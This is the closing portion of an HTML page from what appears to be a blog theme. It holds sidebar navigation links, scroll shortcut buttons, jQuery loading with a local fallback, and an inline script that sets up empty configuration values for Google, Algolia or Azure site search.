                           class="nav-Life dark-btn block">
                            Life
                        </a>
                    </li>
                
            </ul>
        </div>

    </div>

    <div class="shortcuts">
        <a href="#header" class="top window-nav dark-btn" id="go-top">
            <span class="icon icon-chevron-thin-up"></span>
        </a>
        <a class="close dark-btn" id="sidebar-close">
            <span class="icon icon-close"></span>
        </a>
        <a href="#footer" class="top window-nav dark-btn" id="go-bottom">
            <span class="icon icon-chevron-thin-down"></span>
        </a>
    </div>

</div>





<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script>window.jQuery || document.write('<script src="/js/jquery.min.js"><\/script>')</script>


<script src="/js/jquery.fitvids.js"></script>

<script>
  var GOOGLE_CUSTOM_SEARCH_API_KEY = "";
  var GOOGLE_CUSTOM_SEARCH_ENGINE_ID = "";
  var ALGOLIA_API_KEY = "";
  var ALGOLIA_APP_ID = "";
  var ALGOLIA_INDEX_NAME = "";
  var AZURE_SERVICE_NAME = "";
  var AZURE_INDEX_NAME = "";
  var AZURE_QUERY_KEY = "";
  var SEARCH_SERVICE = "";
  var universalSearchConfig = {};
  if (SEARCH_SERVICE === 'google') {
    universalSearchConfig = {
      searchService: SEARCH_SERVICE,
      apiKey: GOOGLE_CUSTOM_SEARCH_API_KEY,
      engineId: GOOGLE_CUSTOM_SEARCH_ENGINE_ID,
      imagePath: "/img/"
    };
  } else if (SEARCH_SERVICE === 'algolia') {
    universalSearchConfig = {
      searchService: SEARCH_SERVICE,
      apiKey: ALGOLIA_API_KEY,
      appId: ALGOLIA_APP_ID,
      indexName: ALGOLIA_INDEX_NAME,
      imagePath: "/img/"
    };
  } else if (SEARCH_SERVICE === 'azure') {
    universalSearchConfig = {
      searchService: SEARCH_SERVICE,
      serviceName: AZURE_SERVICE_NAME,
      indexName: AZURE_INDEX_NAME,
      apiKey: AZURE_QUERY_KEY,
      imagePath: "/img/"
    };
  }
</script>

<script src="/js/app.js"></script>


<script src="/js/search.js"></script>





<script>setLoadingBarProgress(100);</script>

</body>
</html>
